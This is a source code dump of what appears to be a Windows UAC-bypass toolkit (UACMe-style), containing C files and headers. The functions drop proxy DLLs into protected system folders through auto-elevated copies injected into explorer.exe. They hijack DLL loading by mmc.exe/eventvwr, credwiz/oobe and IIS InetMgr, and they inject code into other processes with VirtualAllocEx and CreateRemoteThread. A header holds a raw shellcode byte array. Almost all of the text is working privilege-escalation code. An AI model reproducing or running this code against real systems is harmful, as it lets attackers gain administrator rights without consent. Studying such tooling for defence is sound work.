224 | 				cabAddFile(Cabinet, szDest, L"winsat.exe");
225 | 				cabClose(Cabinet);
226 | 				Cabinet = NULL;
227 | 			}
228 | 			else {
229 | 				break;
230 | 			}
231 | 
232 | 			//extract package
233 | 			ucmWusaExtractPackage(T_WINSAT_CMDLINE);
234 | 
235 | 			RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
236 | 			if (ExpandEnvironmentStrings(T_WINSAT_TARGET, szBuffer, MAX_PATH) == 0)	{
237 | 				break;
238 | 			}
239 | 			bResult = supRunProcess(szBuffer, NULL);
240 | 		}
241 | 		else {
242 | 
243 | 			//wusa extract banned, switch to IFileOperation.
244 | 			RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
245 | 			if (ExpandEnvironmentStringsW(M1W7_TARGETDIR, 
246 | 				szBuffer, MAX_PATH) == 0)
247 | 			{
248 | 				break;
249 | 			}
250 | 			bResult = ucmAutoElevateCopyFile(szSource, szBuffer);
251 | 			if (!bResult) {
252 | 				break;
253 | 			}
254 | 			bResult = ucmAutoElevateCopyFile(szDest, szBuffer);
255 | 			if (!bResult) {
256 | 				break;
257 | 			}
258 | 			
259 | 			Sleep(0);
260 | 
261 | 			//run winsat
262 | 			RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
263 | 			if (ExpandEnvironmentStrings(T_WINSAT_TARGET, szBuffer, MAX_PATH) == 0)	{
264 | 				break;
265 | 			}
266 | 			bResult = supRunProcess(szBuffer, NULL);
267 | 			//cleanup of the above files must be done by payload code
268 | 		}
269 | 
270 | 	} while (cond);
271 | 
272 | 	if (Cabinet) {
273 | 		cabClose(Cabinet);
274 | 	}
275 | 	//remove trash from %temp%
276 | 	if (szDest[0] != 0) {
277 | 		DeleteFileW(szDest);
278 | 	}
279 | 	if (szSource[0] != 0) {
280 | 		DeleteFileW(szSource);
281 | 	}
282 | 
283 | 	return bResult;
284 | }
285 | 
286 | /*
287 | * ucmMMCMethod
288 | *
289 | * Purpose:
290 | *
291 | * Bypass UAC by abusing MMC.exe backdoor hardcoded in appinfo.dll
292 | *
293 | */
294 | BOOL ucmMMCMethod(
295 | 	LPWSTR lpTargetDll,
296 | 	PVOID ProxyDll,
297 | 	DWORD ProxyDllSize
298 | 	)
299 | {
300 | 	BOOL bResult = FALSE, cond = FALSE;
301 | 	WCHAR szSource[MAX_PATH + 1];
302 | 	WCHAR szDest[MAX_PATH + 1];
303 | 	WCHAR szBuffer[MAX_PATH + 1];
304 | 
305 | 	if (
306 | 		(ProxyDll == NULL) ||
307 | 		(ProxyDllSize == 0) ||
308 | 		(lpTargetDll == NULL)
309 | 		)
310 | 	{
311 | 		return bResult;
312 | 	}
313 | 
314 | 	if (_strlen_w(lpTargetDll) > 100) {
315 | 		return bResult;
316 | 	}
317 | 
318 | 	do {
319 | 
320 | 		//put target dll
321 | 		RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
322 | 		_strcpy_w(szBuffer, TEMPDIR);
323 | 		_strcat_w(szBuffer, lpTargetDll);
324 | 
325 | 		//expand string for proxy dll
326 | 		RtlSecureZeroMemory(szSource, sizeof(szSource));
327 | 		if (ExpandEnvironmentStrings(szBuffer, szSource, MAX_PATH) == 0) {
328 | 			break;
329 | 		}
330 | 
331 | 		//write proxy dll to disk
332 | 		if (!supWriteBufferToFile(szSource, ProxyDll, ProxyDllSize)) {
333 | 			break;
334 | 		}
335 | 
336 | 		//expand string for target dir
337 | 		RtlSecureZeroMemory(szDest, sizeof(szDest));
338 | 		if (ExpandEnvironmentStringsW(SYSTEMROOTDIR,
339 | 			szDest, MAX_PATH) == 0)
340 | 		{
341 | 			break;
342 | 		}
343 | 
344 | 		//drop fubuki to system32
345 | 		bResult = ucmAutoElevateCopyFile(szSource, szDest);
346 | 		if (!bResult) {
347 | 			break;
348 | 		}
349 | 
350 | 		//run mmc console
351 | 		//because of mmc harcoded backdoor uac will autoelevate mmc with valid and trusted MS command
352 | 		//event viewer will attempt to load not existing dll, so we will give him our little friend
353 | 		bResult = supRunProcess(L"mmc.exe", L"eventvwr.msc");
354 | 
355 | 	} while (cond);
356 | 
357 | 	return bResult;
358 | }
359 | 
360 | DWORD WINAPI ucmElevatedLaunchProc(
361 | 	PELOAD_PARAMETERS_4 elvpar
362 | 	)
363 | {
364 | 	BOOL				cond = FALSE;
365 | 	SHELLEXECUTEINFOW   shexec;
366 | 
367 | 	if (elvpar == NULL)
368 | 		return (DWORD)E_FAIL;
369 | 
370 | 	do {
371 | 
372 | 		shexec.cbSize = sizeof(shexec);
373 | 		shexec.fMask = SEE_MASK_NOCLOSEPROCESS;
374 | 		shexec.nShow = SW_SHOW;
375 | 		shexec.lpVerb = elvpar->szVerb;
376 | 		shexec.lpFile = elvpar->szTargetApp;
377 | 		shexec.lpParameters = NULL;
378 | 		shexec.lpDirectory = NULL;
379 | 		if (elvpar->xShellExecuteExW(&shexec))
380 | 			if (shexec.hProcess != NULL) {
381 | 				elvpar->xWaitForSingleObject(shexec.hProcess, INFINITE);
382 | 				elvpar->xCloseHandle(shexec.hProcess);
383 | 			}
384 | 
385 | 	} while (cond);
386 | 
387 | 	return S_OK;
388 | }
389 | 
390 | /*
391 | * ucmSirefefMethod
392 | *
393 | * Purpose:
394 | *
395 | * Bypass UAC by abusing OOBE.exe backdoor hardcoded in appinfo.dll
396 | *
397 | */
398 | BOOL ucmSirefefMethod(
399 | 	PVOID ProxyDll,
400 | 	DWORD ProxyDllSize
401 | 	)
402 | {
403 | 	BOOL                    cond = FALSE, bResult = FALSE;
404 | 	DWORD                   c;
405 | 	HANDLE                  hProcess = NULL, hRemoteThread = NULL;
406 | 	HINSTANCE               selfmodule = GetModuleHandle(NULL);
407 | 	PIMAGE_DOS_HEADER       pdosh = (PIMAGE_DOS_HEADER)selfmodule;
408 | 	PIMAGE_FILE_HEADER      fh = (PIMAGE_FILE_HEADER)((char *)pdosh + pdosh->e_lfanew + sizeof(DWORD));
409 | 	PIMAGE_OPTIONAL_HEADER  opth = (PIMAGE_OPTIONAL_HEADER)((char *)fh + sizeof(IMAGE_FILE_HEADER));
410 | 	LPVOID                  remotebuffer = NULL, newEp, newDp;
411 | 	SIZE_T                  NumberOfBytesWritten = 0;
412 | 	PELOAD_PARAMETERS_4     elvpar = &g_ElevParamsSirefef;
413 | 	LPVOID                  elevproc = ucmElevatedLaunchProc;
414 | 
415 | 	WCHAR szBuffer[MAX_PATH * 2];
416 | 	WCHAR szDest[MAX_PATH + 1];
417 | 	WCHAR szSource[MAX_PATH + 1];
418 | 
419 | 	if (
420 | 		(ProxyDll == NULL) ||
421 | 		(ProxyDllSize == 0)
422 | 		)
423 | 	{
424 | 		return bResult;
425 | 	}
426 | 
427 | 	do {
428 | 		//put Fubuki dll as netutils to %temp%
429 | 		RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
430 | 		_strcpy_w(szBuffer, TEMPDIR);
431 | 		_strcat_w(szBuffer, L"netutils.dll");
432 | 		RtlSecureZeroMemory(szSource, sizeof(szSource));
433 | 		if (ExpandEnvironmentStrings(szBuffer, szSource, MAX_PATH) == 0) {
434 | 			break;
435 | 		}
436 | 		if (!supWriteBufferToFile(szSource, ProxyDll, ProxyDllSize)) {
437 | 			break;
438 | 		}
439 | 
440 | 		//copy dll to wbem target folder
441 | 		RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
442 | 		if (ExpandEnvironmentStringsW(WBEMDIR,
443 | 			szBuffer, MAX_PATH) == 0)
444 | 		{
445 | 			break;
446 | 		}
447 | 		//note: uacmAutoElevateCopyFile uses injection to explorer.exe
448 | 		bResult = ucmAutoElevateCopyFile(szSource, szBuffer);
449 | 		if (!bResult) {
450 | 			break;
451 | 		}
452 | 
453 | 		//copy 1st stage target process
454 | 		RtlSecureZeroMemory(szSource, sizeof(szSource));
455 | 		if (ExpandEnvironmentStrings(L"%systemroot%\\system32\\credwiz.exe",
456 | 			szSource, MAX_PATH) == 0)
457 | 		{
458 | 			break;
459 | 		}
460 | 
461 | 		RtlSecureZeroMemory(szDest, sizeof(szDest));
462 | 		if (ExpandEnvironmentStrings(L"%temp%\\oobe.exe",
463 | 			szDest, MAX_PATH) == 0)
464 | 		{
465 | 			break;
466 | 		}
467 | 		if (!CopyFile(szSource, szDest, FALSE)) {
468 | 			break;
469 | 		}
470 | 		bResult = ucmAutoElevateCopyFile(szDest, szBuffer);
471 | 		if (!bResult) {
472 | 			break;
473 | 		}
474 | 
475 | 		//setup basic shellcode routines
476 | 		RtlSecureZeroMemory(&g_ElevParamsSirefef, sizeof(g_ElevParamsSirefef));
477 | 		elvpar->xShellExecuteExW = (pfnShellExecuteExW)GetProcAddress(g_ctx.hShell32, "ShellExecuteExW");
478 | 		elvpar->xWaitForSingleObject = (pfnWaitForSingleObject)GetProcAddress(g_ctx.hKernel32, "WaitForSingleObject");
479 | 		elvpar->xCloseHandle = (pfnCloseHandle)GetProcAddress(g_ctx.hKernel32, "CloseHandle");
480 | 
481 | 		//set shellcode 2nd stage target process
482 | 		RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
483 | 		_strcpy_w(elvpar->szTargetApp, g_ctx.szSystemDirectory); //c:\windows\system32\wbem\oobe.exe
484 | 		_strcat_w(elvpar->szTargetApp, L"\\wbem\\oobe.exe");
485 | 		_strcpy_w(elvpar->szVerb, L"runas");
486 | 		_strcpy_w(szBuffer, g_ctx.szSystemDirectory); //c:\windows\system32\credwiz.exe
487 | 		_strcat_w(szBuffer, L"\\credwiz.exe");
488 | 
489 | 		//run 1st stage target process
490 | 		hProcess = supRunProcessEx(szBuffer, NULL, NULL);
491 | 		if (hProcess == NULL) {
492 | 			break;
493 | 		}
494 | 
495 | 		remotebuffer = VirtualAllocEx(hProcess, NULL, (SIZE_T)opth->SizeOfImage,
496 | 			MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
497 | 
498 | 		if (remotebuffer == NULL) {
499 | 			break;
500 | 		}
501 | 		if (!WriteProcessMemory(hProcess, remotebuffer, selfmodule, opth->SizeOfImage, &NumberOfBytesWritten)) {
502 | 			break;
503 | 		}
504 | 
505 | 		newEp = (char *)remotebuffer + ((char *)elevproc - (char *)selfmodule);
506 | 		newDp = (char *)remotebuffer + ((char *)elvpar - (char *)selfmodule);
507 | 
508 | 		hRemoteThread = CreateRemoteThread(hProcess, NULL, 0, newEp, newDp, 0, &c);
509 | 		bResult = (hRemoteThread != NULL);
510 | 		if (bResult) {
511 | 			WaitForSingleObject(hRemoteThread, INFINITE);
512 | 			CloseHandle(hRemoteThread);
513 | 		}
514 | 
515 | 	} while (cond);
516 | 
517 | 	if (hProcess != NULL) {
518 | 		TerminateProcess(hProcess, 0);
519 | 		CloseHandle(hProcess);
520 | 	}
521 | 	return bResult;
522 | }
523 | 
524 | /*
525 | * ucmGenericAutoelevation
526 | *
527 | * Purpose:
528 | *
529 | * Bypass UAC by abusing target autoelevated system32 application via missing system32 dll
530 | *
531 | */
532 | BOOL ucmGenericAutoelevation(
533 | 	LPWSTR lpTargetApp,
534 | 	LPWSTR lpTargetDll,
535 | 	PVOID ProxyDll,
536 | 	DWORD ProxyDllSize
537 | 	)
538 | {
539 | 	BOOL bResult = FALSE, cond = FALSE;
540 | 	WCHAR szSource[MAX_PATH + 1];
541 | 	WCHAR szDest[MAX_PATH + 1];
542 | 	WCHAR szBuffer[MAX_PATH + 1];
543 | 
544 | 	if (
545 | 		(ProxyDll == NULL) ||
546 | 		(ProxyDllSize == 0) ||
547 | 		(lpTargetApp == NULL) ||
548 | 		(lpTargetDll == NULL)
549 | 		)
550 | 	{
551 | 		return bResult;
552 | 	}
553 | 
554 | 	if (_strlen_w(lpTargetDll) > 100) {
555 | 		return bResult;
556 | 	}
557 | 
558 | 	do {
559 | 
560 | 		//put target dll
561 | 		RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
562 | 		_strcpy_w(szBuffer, TEMPDIR);
563 | 		_strcat_w(szBuffer, lpTargetDll);
564 | 
565 | 		//expand string for proxy dll
566 | 		RtlSecureZeroMemory(szSource, sizeof(szSource));
567 | 		if (ExpandEnvironmentStrings(szBuffer, szSource, MAX_PATH) == 0) {
568 | 			break;
569 | 		}
570 | 
571 | 		//write proxy dll to disk
572 | 		if (!supWriteBufferToFile(szSource, ProxyDll, ProxyDllSize)) {
573 | 			break;
574 | 		}
575 | 
576 | 		//expand string for target dir
577 | 		RtlSecureZeroMemory(szDest, sizeof(szDest));
578 | 		if (ExpandEnvironmentStringsW(SYSTEMROOTDIR,
579 | 			szDest, MAX_PATH) == 0)
580 | 		{
581 | 			break;
582 | 		}
583 | 
584 | 		//drop fubuki to system32
585 | 		bResult = ucmAutoElevateCopyFile(szSource, szDest);
586 | 		if (!bResult) {
587 | 			break;
588 | 		}
589 | 
590 | 		RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
591 | 		if (ExpandEnvironmentStringsW(lpTargetApp,
592 | 			szBuffer, MAX_PATH) == 0)
593 | 		{
594 | 			break;
595 | 		}
596 | 
597 | 		//run target app
598 | 		bResult = supRunProcess(szBuffer, NULL);
599 | 
600 | 	} while (cond);
601 | 
602 | 	return bResult;
603 | }
604 | 
605 | /*
606 | * ucmGWX
607 | *
608 | * Purpose:
609 | *
610 | * Bypass UAC by abusing newly added appinfo.dll backdoor.
611 | * IIS initially not installed in Windows client, but appinfo.dll whitelists IIS application as autoelevated.
612 | * We will use backdoor from "Get Windows 10" bullshit marketing promo package and exploit it with dll hijacking as usual.
613 | *
614 | */
615 | BOOL ucmGWX(
616 | 	VOID
617 | 	)
618 | {
619 | 	BOOL bResult = FALSE, cond = FALSE;
620 | 	WCHAR szDest[MAX_PATH + 1];
621 | 	WCHAR szTargetApp[MAX_PATH + 20];
622 | 	WCHAR szBuffer[MAX_PATH * 2];
623 | 	WCHAR szTempPath[MAX_PATH + 1];
624 | 
625 | 	PVOID Data = NULL;
626 | 	ULONG DecompressedBufferSize = 0;
627 | 
628 | 	do {
629 | 
630 | 		//expand string for target dir
631 | 		RtlSecureZeroMemory(szDest, sizeof(szDest));
632 | 		if (ExpandEnvironmentStringsW(T_IIS_TARGETDIR,
633 | 			szDest, MAX_PATH) == 0)
634 | 		{
635 | 			break;
636 | 		}
637 | 
638 | 		_strcpy_w(szTargetApp, szDest);
639 | 		_strcat_w(szTargetApp, TEXT("\\"));
640 | 		_strcat_w(szTargetApp, T_IIS_TARGETAPP);
641 | 		if (PathFileExistsW(szTargetApp)) {
642 | 			//File already exist, could be IIS installed
643 | 			OutputDebugString(TEXT("[UCM] IIS installed, abort"));
644 | 			break;
645 | 		}
646 | 
647 | 		//summon some unicorns
648 | 		Data = DecompressPayload((CONST PVOID)KONGOUDLL, sizeof(KONGOUDLL), &DecompressedBufferSize);
649 | 		if (Data == NULL)
650 | 			break;
651 | 			
652 | 		//temp
653 | 		RtlSecureZeroMemory(szTempPath, sizeof(szTempPath));
654 | 		if (ExpandEnvironmentStrings(TEMPDIR, szTempPath, MAX_PATH) == 0) {
655 | 			break;
656 | 		}
657 | 
658 | 		//put target dll
659 | 		RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
660 | 		_strcpy_w(szBuffer, szTempPath);
661 | 		_strcat_w(szBuffer, T_IIS_TARGETDLL);
662 | 
663 | 		//write proxy dll to disk
664 | 		if (!supWriteBufferToFile(szBuffer, g_ctx.PayloadDll, g_ctx.PayloadDllSize)) {
665 | 			break;
666 | 		}
667 | 
668 | 		//drop fubuki to system32\inetsrv
669 | 		bResult = ucmAutoElevateCopyFile(szBuffer, szDest);
670 | 		if (!bResult) {
671 | 			break;
672 | 		}
673 | 		DeleteFile(szBuffer);
674 | 
675 | 		//put target app
676 | 		RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
677 | 		_strcpy_w(szBuffer, szTempPath);
678 | 		_strcat_w(szBuffer, T_IIS_TARGETAPP);
679 | 
680 | 		//write app to disk
681 | 		if (!supWriteBufferToFile(szBuffer, Data, DecompressedBufferSize)) {
682 | 			break;
683 | 		}
684 | 		
685 | 		//drop InetMgr.exe to system32\inetsrv
686 | 		bResult = ucmAutoElevateCopyFile(szBuffer, szDest);
687 | 		if (!bResult) {
688 | 			break;
689 | 		}
690 | 		DeleteFile(szBuffer);
691 | 
692 | 		bResult = supRunProcess(szTargetApp, NULL);
693 | 		if (bResult) {
694 | 			OutputDebugString(TEXT("Whoever created this gwx shit must be fired"));
695 | 		}
696 | 
697 | 	} while (cond);
698 | 
699 | 	if (Data != NULL) {
700 | 		VirtualFree(Data, 0, MEM_RELEASE);
701 | 	}
702 | 	return bResult;
703 | }
704 | 


--------------------------------------------------------------------------------
/BypassUAC/hybrids.h:
--------------------------------------------------------------------------------
 1 | /*******************************************************************************
 2 | *
 3 | *  (C) COPYRIGHT AUTHORS, 2015 - 2016
 4 | *
 5 | *  TITLE:       HYBRIDS.H
 6 | *
 7 | *  VERSION:     2.01
 8 | *
 9 | *  DATE:        04 Jan 2016
10 | *
11 | *  Prototypes and definitions for hybrid methods.
12 | *
13 | * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
14 | * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
15 | * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
16 | * PARTICULAR PURPOSE.
17 | *
18 | *******************************************************************************/
19 | #pragma once
20 | 
21 | BOOL ucmAvrfMethod(
22 | 	CONST PVOID AvrfDll,
23 | 	DWORD AvrfDllSize
24 | 	);
25 | 
26 | BOOL ucmWinSATMethod(
27 | 	LPWSTR lpTargetDll,
28 | 	PVOID ProxyDll,
29 | 	DWORD ProxyDllSize,
30 | 	BOOL UseWusa
31 | 	);
32 | 
33 | BOOL ucmMMCMethod(
34 | 	LPWSTR lpTargetDll,
35 | 	PVOID ProxyDll,
36 | 	DWORD ProxyDllSize
37 | 	);
38 | 
39 | BOOL ucmSirefefMethod(
40 | 	PVOID ProxyDll,
41 | 	DWORD ProxyDllSize
42 | 	);
43 | 
44 | BOOL ucmGenericAutoelevation(
45 | 	LPWSTR lpTargetApp,
46 | 	LPWSTR lpTargetDll,
47 | 	PVOID ProxyDll,
48 | 	DWORD ProxyDllSize
49 | 	);
50 | 
51 | BOOL ucmGWX(
52 | 	VOID
53 | 	);
54 | 


--------------------------------------------------------------------------------
/BypassUAC/inazuma32.h:
--------------------------------------------------------------------------------
 1 | /*******************************************************************************
 2 | *
 3 | *  (C) COPYRIGHT AUTHORS, 2015
 4 | *
 5 | *  TITLE:       INAZUMA32.H
 6 | *
 7 | *  VERSION:     1.71
 8 | *
 9 | *  DATE:        25 Apr 2015
10 | *
11 | *  ShellCode for EPO (Inazuma32).
12 | *
13 | * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
14 | * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
15 | * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
16 | * PARTICULAR PURPOSE.
17 | *
18 | *******************************************************************************/
19 | 
20 | static const unsigned char patchcode32[237] = {
21 | 	0xEB, 0x78, 0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x10, 0x53, 0x56, 0x8B, 0xF1, 0x89, 0x55, 0xFC, 0x57,
22 | 	0x8B, 0x46, 0x3C, 0x8B, 0x44, 0x30, 0x78, 0x03, 0xC6, 0x8B, 0x48, 0x24, 0x8B, 0x50, 0x20, 0x03,
23 | 	0xCE, 0x8B, 0x58, 0x1C, 0x03, 0xD6, 0x8B, 0x40, 0x18, 0x03, 0xDE, 0x89, 0x4D, 0xF0, 0x33, 0xC9,
24 | 	0x89, 0x55, 0xF4, 0x89, 0x45, 0xF8, 0x85, 0xC0, 0x74, 0x29, 0x8B, 0x14, 0x8A, 0x03, 0xD6, 0x33,
25 | 	0xFF, 0xEB, 0x0C, 0x0F, 0xBE, 0xC0, 0x33, 0xC7, 0xC1, 0xC0, 0x03, 0x40, 0x42, 0x8B, 0xF8, 0x8A,
26 | 	0x02, 0x84, 0xC0, 0x75, 0xEE, 0x3B, 0x7D, 0xFC, 0x74, 0x12, 0x8B, 0x55, 0xF4, 0x41, 0x3B, 0x4D,
27 | 	0xF8, 0x72, 0xD7, 0x33, 0xC0, 0x5F, 0x5E, 0x5B, 0x8B, 0xE5, 0x5D, 0xC3, 0x8B, 0x45, 0xF0, 0x0F,
28 | 	0xB7, 0x04, 0x48, 0x8B, 0x04, 0x83, 0x03, 0xC6, 0xEB, 0xEB, 0x55, 0x8B, 0xEC, 0x81, 0xEC, 0x10,
29 | 	0x01, 0x00, 0x00, 0x64, 0xA1, 0x18, 0x00, 0x00, 0x00, 0x56, 0x57, 0x6A, 0x02, 0x8B, 0x40, 0x30,
30 | 	0x8B, 0x40, 0x0C, 0x8B, 0x78, 0x0C, 0x83, 0x65, 0xFC, 0x00, 0xC7, 0x45, 0xF4, 0x25, 0x54, 0x4D,
31 | 	0x50, 0xC7, 0x45, 0xF8, 0x25, 0x5C, 0x72, 0x33, 0x58, 0x8B, 0x3F, 0x48, 0x75, 0xFB, 0x8B, 0x4F,
32 | 	0x18, 0xBA, 0x08, 0x7E, 0xB3, 0x69, 0xE8, 0x47, 0xFF, 0xFF, 0xFF, 0x8B, 0x4F, 0x18, 0x8B, 0xF0,
33 | 	0x68, 0x04, 0x01, 0x00, 0x00, 0x8D, 0x85, 0xF0, 0xFE, 0xFF, 0xFF, 0xBA, 0xA2, 0x90, 0x38, 0xF5,
34 | 	0x50, 0x8D, 0x45, 0xF4, 0x50, 0xE8, 0x28, 0xFF, 0xFF, 0xFF, 0xFF, 0xD0, 0x8D, 0x85, 0xF0, 0xFE,
35 | 	0xFF, 0xFF, 0x50, 0xFF, 0xD6, 0x5F, 0x33, 0xC0, 0x5E, 0x8B, 0xE5, 0x5D, 0xC3
36 | };
37 | 


--------------------------------------------------------------------------------
/BypassUAC/inject.c:
--------------------------------------------------------------------------------
  1 | /*******************************************************************************
  2 | *
  3 | *  (C) COPYRIGHT AUTHORS, 2014 - 2016
  4 | *
  5 | *  TITLE:       INJECT.C
  6 | *
  7 | *  VERSION:     2.00
  8 | *
  9 | *  DATE:        12 Nov 2015
 10 | *
 11 | *  Inject module.
 12 | *
 13 | * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
 14 | * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
 15 | * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
 16 | * PARTICULAR PURPOSE.
 17 | *
 18 | *******************************************************************************/
 19 | #include "global.h"
 20 | 
 21 | /*
 22 | * ucmInject
 23 | *
 24 | * Purpose:
 25 | *
 26 | * Inject data and run remote thread inside Explorer process.
 27 | *
 28 | */
 29 | BOOL ucmInjectExplorer(
 30 | 	_In_ LPVOID ElevParams,
 31 | 	_In_ LPVOID ElevatedLoadProc
 32 | 	)
 33 | {
 34 | 	BOOL					cond = FALSE, bResult = FALSE, bZombie = FALSE;
 35 | 	DWORD					c;
 36 | 	HANDLE					hProcess = NULL, hRemoteThread = NULL;
 37 | 	HINSTANCE               selfmodule = GetModuleHandle(NULL);
 38 | 	PIMAGE_DOS_HEADER       pdosh = (PIMAGE_DOS_HEADER)selfmodule;
 39 | 	PIMAGE_FILE_HEADER      fh = (PIMAGE_FILE_HEADER)((char *)pdosh + pdosh->e_lfanew + sizeof(DWORD));
 40 | 	PIMAGE_OPTIONAL_HEADER  opth = (PIMAGE_OPTIONAL_HEADER)((char *)fh + sizeof(IMAGE_FILE_HEADER));
 41 | 	LPVOID                  remotebuffer = NULL, newEp, newDp;
 42 | 	SIZE_T                  NumberOfBytesWritten = 0;
 43 | 
 44 | 	if (
 45 | 		(ElevParams == NULL) ||
 46 | 		(ElevatedLoadProc == NULL)
 47 | 		)
 48 | 	{
 49 | 		return bResult;
 50 | 	}
 51 | 
 52 | 	do {
 53 | 		//
 54 | 		// Open explorer handle with maximum allowed rights.
 55 | 		//
 56 | 		hProcess = supGetExplorerHandle();
 57 | 		if (hProcess == NULL) {
 58 | 			hProcess = supRunProcessEx(L"explorer.exe", NULL, NULL);
 59 | 			if (hProcess != NULL) {
 60 | 				bZombie = TRUE;
 61 | 			}
 62 | 		}
 63 | 		if (hProcess == NULL) {
 64 | 			OutputDebugString(TEXT("[UCM] Cannot open target process."));
 65 | 			break;
 66 | 		}
 67 | 
 68 | 		//
 69 | 		// Allocate buffer in target process and write itself inside.
 70 | 		//
 71 | 		remotebuffer = VirtualAllocEx(hProcess, NULL, (SIZE_T)opth->SizeOfImage,
 72 | 			MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
 73 | 
 74 | 		if (remotebuffer == NULL) {
 75 | 			OutputDebugString(TEXT("[UCM] Cannot allocate memory in target process."));
 76 | 			break;
 77 | 		}
 78 | 		if (!WriteProcessMemory(hProcess, remotebuffer, selfmodule, opth->SizeOfImage, &NumberOfBytesWritten)) {
 79 | 			OutputDebugString(TEXT("[UCM] Cannot write to the target process memory."));
 80 | 			break;
 81 | 		}
 82 | 
 83 | 		//
 84 | 		// Calculate new entry point offset and run remote thread with it.
 85 | 		//
 86 | 		newEp = (char *)remotebuffer + ((char *)ElevatedLoadProc - (char *)selfmodule);
 87 | 		newDp = (char *)remotebuffer + ((char *)ElevParams - (char *)selfmodule);
 88 | 
 89 | 		hRemoteThread = CreateRemoteThread(hProcess, NULL, 0, newEp, newDp, 0, &c);
 90 | 		bResult = (hRemoteThread != NULL);
 91 | 		if (bResult) {
 92 | 			WaitForSingleObject(hRemoteThread, INFINITE);
 93 | 			CloseHandle(hRemoteThread);
 94 | 		}
 95 | 
 96 | 	} while (cond);
 97 | 
 98 | 	//
 99 | 	// Close target process handle.
100 | 	//
101 | 	if (hProcess != NULL) {
102 | 		if (bZombie) {
103 | 			TerminateProcess(hProcess, 0);
104 | 		}
105 | 		CloseHandle(hProcess);
106 | 	}
107 | 	return bResult;
108 | }
109 | 


--------------------------------------------------------------------------------
/BypassUAC/inject.h:
--------------------------------------------------------------------------------
  1 | /*******************************************************************************
  2 | *
  3 | *  (C) COPYRIGHT AUTHORS, 2014 - 2016
  4 | *
  5 | *  TITLE:       INJECT.H
  6 | *
  7 | *  VERSION:     2.00
  8 | *
  9 | *  DATE:        16 Nov 2015
 10 | *
 11 | *  Injector prototypes and definitions.
 12 | *
 13 | * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
 14 | * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
 15 | * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
 16 | * PARTICULAR PURPOSE.
 17 | *
 18 | *******************************************************************************/
 19 | #pragma once
 20 | 
 21 | #include <AccCtrl.h>
 22 | 
 23 | typedef HRESULT(WINAPI *pfnCoInitialize)(LPVOID pvReserved);
 24 | typedef HRESULT(WINAPI *pfnCoCreateInstance)(REFCLSID rclsid, LPUNKNOWN pUnkOuter, DWORD dwClsContext, REFIID riid, LPVOID FAR * ppv);
 25 | typedef HRESULT(WINAPI *pfnCoGetObject)(LPCWSTR pszName, BIND_OPTS *pBindOptions, REFIID riid, void **ppv);
 26 | typedef HRESULT(WINAPI *pfnSHCreateItemFromParsingName)(PCWSTR pszPath, IBindCtx *pbc, REFIID riid, void **ppv);
 27 | typedef BOOL(WINAPI *pfnShellExecuteExW)(SHELLEXECUTEINFOW *pExecInfo);
 28 | typedef DWORD(WINAPI *pfnWaitForSingleObject)(HANDLE hHandle, DWORD dwMilliseconds);
 29 | typedef BOOL(WINAPI *pfnCloseHandle)(HANDLE hObject);
 30 | typedef void(WINAPI *pfnCoUninitialize)(void);
 31 | typedef void(WINAPI *pfnOutputDebugStringW)(LPCWSTR lpOutputString);
 32 | typedef void (WINAPI *pfnSleep)(DWORD dwMilliseconds);
 33 | 
 34 | typedef struct _ELOAD_PARAMETERS {
 35 | 	//
 36 | 	IID		xIID_IShellItem;
 37 | 	IID		xIID;
 38 | 	CLSID	xCLSID;
 39 | 	//
 40 | 	pfnCoInitialize					xCoInitialize;
 41 | 	pfnCoCreateInstance				xCoCreateInstance;
 42 | 	pfnCoGetObject					xCoGetObject;
 43 | 	pfnSHCreateItemFromParsingName	xSHCreateItemFromParsingName;
 44 | 	pfnShellExecuteExW				xShellExecuteExW;
 45 | 	pfnWaitForSingleObject			xWaitForSingleObject;
 46 | 	pfnCloseHandle					xCloseHandle;
 47 | 	pfnCoUninitialize				xCoUninitialize;
 48 | 	pfnOutputDebugStringW			xOutputDebugStringW;
 49 | 
 50 | 	WCHAR	EleMoniker[MAX_PATH];
 51 | 	WCHAR	SourceFilePathAndName[MAX_PATH + 1];
 52 | 	WCHAR	DestinationDir[MAX_PATH + 1];
 53 | 	WCHAR	ExePathAndName[MAX_PATH + 1];
 54 | } ELOAD_PARAMETERS, *PELOAD_PARAMETERS;
 55 | 
 56 | typedef struct _ELOAD_PARAMETERS_2 {
 57 | 	SE_OBJECT_TYPE        ObjectType;
 58 | 	SECURITY_INFORMATION  SecurityInformation;
 59 | 	//
 60 | 	WCHAR            szTargetObject[MAX_PATH + 1];
 61 | 	WCHAR            szNewSDDL[MAX_PATH + 1];
 62 | 	WCHAR	         EleMoniker[MAX_PATH];
 63 | 	//
 64 | 	IID		         xIID_ISecurityEditor;
 65 | 	CLSID	         xCLSID_ShellSecurityEditor;
 66 | 	//
 67 | 	pfnCoInitialize					xCoInitialize;
 68 | 	pfnCoCreateInstance				xCoCreateInstance;
 69 | 	pfnCoGetObject					xCoGetObject;
